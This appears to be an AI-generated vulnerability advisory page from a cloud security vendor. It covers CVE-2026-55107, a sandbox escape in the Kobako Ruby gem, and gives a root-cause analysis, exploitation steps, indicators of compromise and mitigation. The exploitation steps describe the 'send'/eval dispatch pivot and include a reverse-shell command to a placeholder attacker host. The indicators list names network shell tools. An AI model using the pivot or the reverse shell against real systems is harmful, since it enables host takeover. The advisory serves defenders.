CVE-2026-55107: 
Ruby Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-55107 is a critical sandbox escape vulnerability in the Kobako Ruby gem that allows a guest mruby script to execute arbitrary Ruby code in the host process, fully bypassing the sandbox isolation guarantee. It affects all released versions of kobako from 0.1.0 through 0.9.0 (RubyGems). The vulnerability was originally reported and fixed by Ahmed Al Hafoudh, first published on June 11, 2026, and added to the GitHub Advisory Database on August 18, 2026. It carries a CVSS v3.1 base score of 10.0 (Critical) (GitHub Advisory).

Détails techniques

The root cause is classified as CWE-94 (Code Injection) and CWE-470 (Unsafe Reflection). Kobako's transport dispatcher passes guest-supplied method names directly to Object#public_send on bound host Service objects without any allowlist or ownership check:

target.public_send(method.to_sym, *args, **kwargs, &block)

Because public_send can invoke any public method — including Ruby's ambient reflection surface — a guest script can pivot through the public send method into otherwise private Kernel methods. Specifically, a dispatch request with method = "send" and args = [:eval, "<ruby>"] evaluates to target.send(:eval, "<ruby>"), executing attacker-controlled Ruby in the host process. Any bound Service object is sufficient to trigger this; no Service-specific behavior is required, and the vulnerable public_send sink existed under three successive internal names (registry → rpc → transport) across all affected versions (GitHub Advisory, Fix Commit).

Impact

Successful exploitation results in a complete sandbox escape, granting the attacker full remote code execution (RCE) in the host Ruby process. An attacker can read or modify host state, access sensitive data, spawn arbitrary processes, and potentially pivot laterally to other systems accessible from the host. This defeats the gem's central security guarantee of isolating untrusted mruby scripts, meaning any deployment that runs untrusted or attacker-influenced scripts is fully compromised. The CVSS scope is marked "Changed," reflecting that the impact extends beyond the sandboxed component to the broader host environment (GitHub Advisory).

Exploitabilité

No public proof-of-concept exploit code has been published, and there is no evidence of in-the-wild exploitation at this time (GitHub Advisory). However, the vulnerability requires no authentication, no privileges, and no user interaction, making it trivially exploitable by any guest script that can submit dispatch requests to a vulnerable Kobako instance. The vulnerability has been detected by Qualys scanners (detection ID 5017052) and is tracked by Tenable cloud security plugins (Feedly). No CISA KEV catalog listing or threat actor attribution has been identified.

Étapes d’exploitation

  1. Identify a target: Locate a Ruby application using the kobako gem (versions 0.1.0–0.9.0) that exposes a Kobako sandbox accepting guest mruby scripts or transport dispatch requests, either directly or via a network-accessible interface.
  2. Craft a malicious dispatch request: Construct a transport Request object targeting any bound Service object (e.g., Cfg::Theme) with method_name set to "send" and args set to [:eval, "<arbitrary ruby code>"].
  3. Submit the request: Send the encoded request across the wasm/transport boundary to the Kobako dispatcher. No authentication or special privileges are required.
  4. Trigger the pivot: The dispatcher calls target.public_send(:send, :eval, "<arbitrary ruby code>"), which resolves to target.send(:eval, "<arbitrary ruby code>"), executing the attacker's Ruby code in the host process.
  5. Achieve host RCE: The injected Ruby code runs with full host process privileges, enabling actions such as reading environment variables, writing files, spawning reverse shells (e.g., system("bash -i >& /dev/tcp/attacker/4444 0>&1")), or exfiltrating data (GitHub Advisory, Fix Commit).

Indicateurs de compromis

  • Logs: Kobako transport dispatcher logs showing dispatch requests with method_name values of send, __send__, public_send, instance_eval, instance_exec, eval, method, tap, instance_variable_get, or class targeting any bound Service.
  • Process: Unexpected child processes spawned by the Ruby host process (e.g., bash, sh, curl, wget, python, nc) that are not part of normal application behavior.
  • Network: Outbound connections from the Ruby host process to unexpected external IP addresses or ports, potentially indicating reverse shell activity.
  • File System: New or modified files in the application directory, unexpected cron jobs, or scripts written by the Ruby process user account.
  • Application Behavior: UndefinedTargetError exceptions in logs (post-patch) indicating blocked meta-method invocation attempts, which may signal active exploitation attempts against a patched system (GitHub Advisory, Fix Commit).

Atténuation et solutions de contournement

Upgrade the kobako gem to version 0.9.1, which introduces a reject_meta_method! guard that checks the resolved method owner against a META_OWNERS constant ([BasicObject, Kernel, Object, Module, Class]) and raises UndefinedTargetError for any match, blocking all ambient reflection methods. There is no in-version workaround; the only interim mitigation is to not bind any host Service object into a sandbox that runs untrusted scripts until the upgrade can be applied. Upgrading to 0.9.1 is the recommended and only complete remediation (GitHub Advisory, Fix Commit).

Ressources additionnelles


Source: Ce rapport a été généré à l’aide de l’IA

Apparenté Ruby Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-55107CRITICAL10
  • Ruby logoRuby
  • kobako
NonOuiSep 30, 2026
CVE-2026-77602CRITICAL9.9
  • Ruby logoRuby
  • openc3
NonOuiSep 23, 2026
CVE-2026-77601HIGH8.8
  • Ruby logoRuby
  • openc3
NonOuiSep 23, 2026
CVE-2026-84782HIGH8.2
  • Ruby logoRuby
  • rpm-sequoia-devel
NonOuiSep 29, 2026
GHSA-4825-p4xm-pcf2HIGH7.1
  • Ruby logoRuby
  • spree_api
NonOuiSep 22, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités